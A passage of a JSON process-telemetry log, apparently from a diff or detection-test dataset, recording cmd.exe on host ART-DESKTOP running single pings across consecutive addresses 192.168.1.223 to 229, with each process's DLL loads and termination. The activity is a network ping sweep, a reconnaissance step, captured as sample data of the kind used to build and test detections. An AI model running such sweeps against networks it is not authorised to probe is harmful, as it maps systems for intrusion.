192.168.1.223", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 764, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "process", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573086830000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.224", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573086990000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "process", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573091990000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.225", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7928, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "process", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.226", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5520, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573097029984, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "process", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573101830000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.227", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6296, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "process", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573106990000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.228", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 728, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "process", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573111990000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.229", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6052, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": 